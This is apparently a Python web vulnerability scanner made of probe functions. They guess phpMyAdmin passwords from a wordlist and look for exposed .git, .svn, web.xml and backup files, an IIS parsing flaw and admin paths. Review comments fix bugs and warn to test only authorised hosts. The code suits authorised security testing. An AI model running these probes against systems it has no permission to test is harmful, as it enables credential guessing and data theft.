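def poc(url):
    """Find phpMyAdmin login pages under ``url`` and try a weak-password list.

    The site index is requested first; if it does not answer, the probe is
    skipped and ``None`` is returned. Every path in ``PHPMYADMIN_DICT`` is then
    fetched and kept when it answers 200 with ``PHPMYADMIN_KEYWORD`` in the
    body. For each such path every entry of ``PHPMYADMIN_PASSWORD_DICT`` is
    posted to ``<path>/index.php``; a 200 response containing
    ``PHPMYADMIN_LOGIN_OK_KWD`` is recorded as a successful login.

    Returns a list of ``'[phpMyAdmin_PWD] <path>|root|<password>'`` strings
    when at least one login succeeded, otherwise ``None``. The original
    collected these hits but never returned them, so callers always saw
    ``None``.

    NOTE(review): this is online password guessing. Only run it against
    hosts you are authorised to test; each discovered path receives one
    POST per candidate password, which will show up in the target's logs
    and may trigger lockout or rate limiting.
    """
    testurl = urlhandler(url)
    if not siteIndexTest(testurl):
        return  # '[SiteRequestErr-phpMyAdmin] %s' % testurl

    # Step 1: which candidate paths actually serve phpMyAdmin.
    pmd_path_result = []
    for d in PHPMYADMIN_DICT:
        payload = testurl + d
        try:
            r = requests.get(payload, headers=HEADERS, timeout=TIMEOUT,
                             verify=VERIFY)
            if r.status_code == 200 and PHPMYADMIN_KEYWORD in r.content:
                pmd_path_result.append(payload)
        except Exception:
            # Best-effort probe: an unreachable path is simply not a hit.
            pass

    # Step 2: try every password against each discovered login page.
    pwd_ok_result = []
    for pmd_path in pmd_path_result:
        for password in PHPMYADMIN_PASSWORD_DICT:
            # NOTE(review): the result line below labels the account 'root';
            # make sure that matches the pma_username actually posted here.
            poc_data = {'pma_username': '******', 'pma_password': password}
            try:
                r = requests.post(pmd_path + '/index.php', data=poc_data,
                                  headers=HEADERS, timeout=TIMEOUT,
                                  verify=VERIFY)
                if r.status_code == 200 and PHPMYADMIN_LOGIN_OK_KWD in r.content:
                    pwd_ok_result.append(
                        '[phpMyAdmin_PWD] ' + pmd_path + '|root|' + password)
            except Exception as e:
                # Transport errors are reported but do not abort the run;
                # the next password / path is still attempted.
                print(e)

    # Same convention as the other probes: a list on success, None otherwise.
    if pwd_ok_result:
        return pwd_ok_result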
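def poc(url):
    """Fingerprint one site: resolved IP, HTTP status chain and page title.

    ``urlhandler`` normalises ``url``; the host part is resolved with
    ``gethostbyname`` (failure leaves the IP column empty). The page is then
    fetched, retrying on any exception until ``RETRY_CNT`` attempts have
    failed, in which case ``None`` is returned. ``None`` is also returned
    when the decoded body is empty.

    Returns one report line ``"{ip:<20}  {codes:<10}  {url:<26}  {title}"``
    where ``codes`` lists the status of every redirect hop followed by the
    final response, and ``title`` is the first ``<title>`` match, stripped
    and cut to 30 characters (``None`` when the page has none).
    """
    testurl = urlhandler(url)
    payload = testurl
    nodomain = urlparse.urlparse(payload).netloc
    ip_list = ''
    try:
        ip_list = gethostbyname(str(nodomain.strip()))
    except Exception:
        # Unresolvable host: still probe the URL, just leave the IP blank.
        pass

    try_cnt = 0
    while True:
        try:
            r = requests.get(payload,
                             headers=HEADERS,
                             timeout=TIMEOUT,
                             verify=VERIFY,
                             stream=STREAM)
            # chardet reports encoding=None for empty or undecidable bodies;
            # the original then raised inside decode() and burned a retry on
            # a perfectly good response. Fall back to UTF-8 and tolerate
            # stray bytes: this text is only used for the title regex.
            encoding = chardet.detect(r.content).get('encoding') or 'utf-8'
            repcontent = r.content.decode(encoding, 'replace')
            r_status_code = r.status_code
            # Kept from the original as a guard against a missing status.
            # The original wrote ``is not ''``, comparing an int with a str
            # literal by identity (always true, SyntaxWarning on 3.8+).
            if r_status_code is not None:
                if repcontent:
                    url_title = re.search('<title>(.*)</title>', repcontent,
                                          re.I | re.S)
                    if url_title:
                        url_title = url_title.group(1).strip()[:30]
                    # Redirect hops first (empty when there were none),
                    # then the final status code.
                    status_lst = [hop.status_code for hop in r.history]
                    status_lst.append(r_status_code)
                    return "{:<20}  {:<10}  {:<26}  {}".format(
                        ip_list, status_lst, url, url_title)
            else:
                # The original had a typo here ('fromat') that raised
                # AttributeError into the retry loop.
                print('{} {}'.format(payload, r_status_code))
            break
        except Exception:
            try_cnt += 1
            if try_cnt >= RETRY_CNT:
                return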
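def poc(url):
    """Check whether ``url`` exposes its ``.git/config``.

    Requests ``<url>.git/config`` and returns ``'[Git_Leak] <url>'`` when
    ``GIT_KEYWORD`` appears in the body, ``None`` otherwise. Any exception
    from the request counts as one failed attempt; after ``RETRY_CNT``
    failures the probe gives up and returns ``None``.

    The original never incremented ``try_cnt``, so a host that kept timing
    out (or any persistent error inside the ``try``) looped forever.

    NOTE(review): only the body is inspected, not the status code; a site
    that answers every path with 200 is a hit only if the page also contains
    ``GIT_KEYWORD``. A readable ``.git/config`` usually means the rest of the
    repository's object store is fetchable as well.
    """
    testurl = urlhandler(url)
    payload = testurl + ".git/config"

    try_cnt = 0
    while True:
        try:
            r = requests.get(payload,
                             headers=HEADERS,
                             timeout=TIMEOUT,
                             verify=VERIFY)
            if GIT_KEYWORD in r.content:
                return '[Git_Leak] %s' % payload
            break
        except Exception:
            try_cnt += 1  # was missing: the loop never terminated on errors
            if try_cnt >= RETRY_CNT:
                return  # '[RequestErr-Git_Leak] %s' % payload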
def poc(url):
    """Probe the ``robots.txt/.php`` path-parsing check labelled ``iis7.5_parse``.

    After confirming the site index responds (otherwise ``None``), requests
    ``<url>robots.txt/.php`` and returns ``'[iis7.5_parse] <url>'`` when
    ``IISPARSE_KEYWORD`` appears in the body. Returns ``False`` when the
    keyword is absent or the request raises.
    """
    testurl = urlhandler(url)
    if not siteIndexTest(testurl):
        return  # '[SiteRequestErr-iisparse] %s' % testurl

    payload = testurl + "robots.txt/.php"
    try:
        resp = requests.get(payload,
                            headers=HEADERS,
                            timeout=TIMEOUT,
                            verify=VERIFY)
        hit = IISPARSE_KEYWORD in resp.content
    except Exception:
        # Transport error: report as "not vulnerable" rather than unknown.
        return False
    return '[iis7.5_parse] %s' % payload if hit else False
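def poc(url):
    """Report which paths from ``JQUERY_DICT`` serve a page matching ``JQUERY_KEYWORD``.

    The site index is checked first (``None`` when it does not respond). Each
    path is stripped, appended to the normalised URL and fetched; a 200
    response whose body contains ``JQUERY_KEYWORD`` is recorded as
    ``'[jQuery] <url>'``. Request errors are ignored.

    Returns the list of hits, or ``None`` when there were none. The original
    built this list but never returned it, so the check always reported
    nothing; this mirrors the convention used by the other probes.
    """
    testurl = urlhandler(url)
    if not siteIndexTest(testurl):
        return  # '[SiteRequestErr-Jquery] %s' % testurl

    result = []
    for path in JQUERY_DICT:
        try:
            payload = testurl + path.strip()
            r = requests.get(payload,
                             headers=HEADERS,
                             timeout=TIMEOUT,
                             verify=VERIFY)
            if r.status_code == 200 and JQUERY_KEYWORD in r.content:
                result.append("[jQuery] " + payload)
        except Exception:
            # Best-effort probe: an unreachable path is simply not a hit.
            pass

    if result:
        return result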
def poc(url):
    """Test whether ``url`` serves ``WEB-INF/web.xml``.

    Returns ``'[WebXml_Leak] <url>'`` when ``WEBXML_KEYWORD`` is found in the
    response body, ``None`` when it is not. Any exception from the request
    counts as a failed attempt; after ``RETRY_CNT`` failures the probe gives
    up and returns ``None``.
    """
    testurl = urlhandler(url)
    payload = testurl + "WEB-INF/web.xml"

    failures = 0
    while True:
        try:
            resp = requests.get(payload,
                                headers=HEADERS,
                                timeout=TIMEOUT,
                                verify=VERIFY)
            leaked = WEBXML_KEYWORD in resp.content
        except Exception:
            failures += 1
            if failures >= RETRY_CNT:
                return  # '[RequestErr-WebXml_Leak] %s' % payload
            continue
        if leaked:
            return '[WebXml_Leak] %s' % payload
        return
def poc(url):
    """Test whether ``url`` serves ``.svn/entries``.

    Returns ``'[Svn_Leak] <url>'`` when ``SVN_KEYWORD`` is found in the
    response body, ``None`` when it is not. Any exception from the request
    counts as a failed attempt; after ``RETRY_CNT`` failures the probe gives
    up and returns ``None``.
    """
    testurl = urlhandler(url)
    payload = testurl + ".svn/entries"

    failures = 0
    while True:
        try:
            resp = requests.get(payload,
                                headers=HEADERS,
                                timeout=TIMEOUT,
                                verify=VERIFY)
            leaked = SVN_KEYWORD in resp.content
        except Exception:
            failures += 1
            if failures >= RETRY_CNT:
                return  # '[RequestErr-Svn_Leak] %s' % payload
            continue
        if leaked:
            return '[Svn_Leak] %s' % payload
        return
def poc(url):
    """List the paths from ``PHPMYADMIN_DICT`` that serve phpMyAdmin under ``url``.

    Skips the host (``None``) when the site index does not respond. A path
    counts as a hit when it answers 200 with ``PHPMYADMIN_KEYWORD`` in the
    body; request errors are treated as misses.

    Returns ``['[phpMyAdmin] <url>', ...]`` or ``None`` when nothing matched.
    """
    testurl = urlhandler(url)
    if not siteIndexTest(testurl):
        return  # '[SiteRequestErr-phpMyAdmin] %s' % testurl

    def _serves_pma(candidate):
        # False on any transport error: an unreachable path is not a hit.
        try:
            resp = requests.get(candidate,
                                headers=HEADERS,
                                timeout=TIMEOUT,
                                verify=VERIFY)
            return resp.status_code == 200 and PHPMYADMIN_KEYWORD in resp.content
        except Exception:
            return False

    hits = ['[phpMyAdmin] %s' % (testurl + d)
            for d in PHPMYADMIN_DICT if _serves_pma(testurl + d)]
    return hits or None
def poc(url):
    """List the paths from ``DZ_TOOLS_DICT`` that are reachable under ``url``.

    Skips the host (``None``) when the site index does not respond. A path
    counts as a hit when it answers 200 with ``DZ_TOOLS_KEYWORD`` in the
    body; request errors are treated as misses.

    Returns ``['[dz_tools] <url>', ...]`` or ``None`` when nothing matched.
    """
    testurl = urlhandler(url)
    if not siteIndexTest(testurl):
        return  # '[SiteRequestErr-Dz_tools] %s' % testurl

    def _is_hit(candidate):
        # False on any transport error: an unreachable path is not a hit.
        try:
            resp = requests.get(candidate,
                                headers=HEADERS,
                                timeout=TIMEOUT,
                                verify=VERIFY)
            return resp.status_code == 200 and DZ_TOOLS_KEYWORD in resp.content
        except Exception:
            return False

    hits = ['[dz_tools] %s' % (testurl + v)
            for v in DZ_TOOLS_DICT if _is_hit(testurl + v)]
    return hits or None
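def audit(url):
    """Look for backup/archive files named after the host under ``url``.

    Candidate names are every entry of ``BAKFILE_DICT`` plus, for each suffix
    in ``BakFileSuffixFormat``, eight stems derived from the host name (full
    host, host without dots, host without its first label, the first label,
    the second label, underscore variants, ...). Each candidate is requested
    with ``stream=STREAM`` and reported when the server answers 200 with a
    Content-Type that is neither ``text/html`` nor ``image/*`` and
    ``rar_size`` of its Content-Length is not ``'0K'``.

    Returns the list of ``'[BAKFILE] <url> Size:<size> <type>'`` strings when
    fewer than 10 were found, ``None`` when 10 or more were found (presumably
    a server that answers 200 to everything; this threshold is inherited
    from the original), and ``u"[BAKFILE] DomainHandlerError"`` when the
    host has fewer than two labels.

    Fixes over the original: ``r.headers["Content-Type"]`` was indexed before
    the membership test, so a missing header raised KeyError into the bare
    ``except`` and the guard never ran; a missing Content-Length likewise
    blew up in ``int(None)``. Streaming responses are now closed so the
    connection is not held open for every candidate.
    """
    parse = urlparse(url)
    url_netloc = parse.netloc
    url = urlhandler(url)
    host_keys = url_netloc.split('.')

    # Host joined without dots; the first label is dropped when there are
    # three or more labels (e.g. the "www" of www.example.com).
    if len(host_keys) > 2:
        topdomainnopoint = ''.join(host_keys[1:])
    else:
        topdomainnopoint = ''.join(host_keys)

    try:
        realdomain = url_netloc
        domainnopoint = realdomain.replace('.', '')
        topdomain = realdomain.split('.', 1)[-1]
        hosthead = host_keys[0]
        domaincenter = host_keys[1]  # IndexError for single-label hosts
        domainunderline = realdomain.replace('.', '_')
        topdomainunderline = topdomain.replace('.', '_')

        domainDic = [
            realdomain, domainnopoint, topdomainnopoint, topdomain, hosthead,
            domaincenter, domainunderline, topdomainunderline
        ]

    except Exception:
        return u"[BAKFILE] DomainHandlerError"

    # Static wordlist first, then host-derived names, without duplicates.
    listFile = list(BAKFILE_DICT)
    for s in BakFileSuffixFormat:
        for d in domainDic:
            if d + s not in listFile:
                listFile.append(d + s)

    warning_list = []
    for payload in listFile:
        vul_url = url + payload

        try:
            r = requests.get(vul_url,
                             headers=HEADERS,
                             timeout=TIMEOUT,
                             allow_redirects=ALLOW_REDIRECTS,
                             stream=STREAM,
                             verify=VERIFY)
        except Exception:
            # Best-effort probe: a request error is simply not a hit.
            continue

        try:
            contentType = r.headers.get("Content-Type")
            if r.status_code == 200 and contentType is not None \
                    and 'text/html' not in contentType \
                    and 'image/' not in contentType:
                # No or unparsable Content-Length: treat as size 0 and let
                # rar_size decide (the original skipped such responses via
                # the exception path, so the outcome is unchanged).
                try:
                    length = int(r.headers.get('Content-Length', 0))
                except (TypeError, ValueError):
                    length = 0
                rarsize = rar_size(length)
                if rarsize != '0K':
                    warning_list.append("[BAKFILE] %s Size:%s %s" %
                                        (vul_url, rarsize, contentType))
        except Exception:
            pass
        finally:
            # With stream=True the body is never read; close so the pooled
            # connection is released instead of lingering per candidate.
            r.close()

    if len(warning_list) < 10:
        return warning_list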
def poc(url):
    """Entry point for the backup-file check.

    Normalises ``url``, confirms the site index responds, and hands the
    result to ``audit``. Returns ``None`` without probing when the index
    check fails.
    """
    testurl = urlhandler(url)
    if siteIndexTest(testurl):
        return audit(testurl)
    return  # '[SiteRequestErr-bakfile] %s' % testurl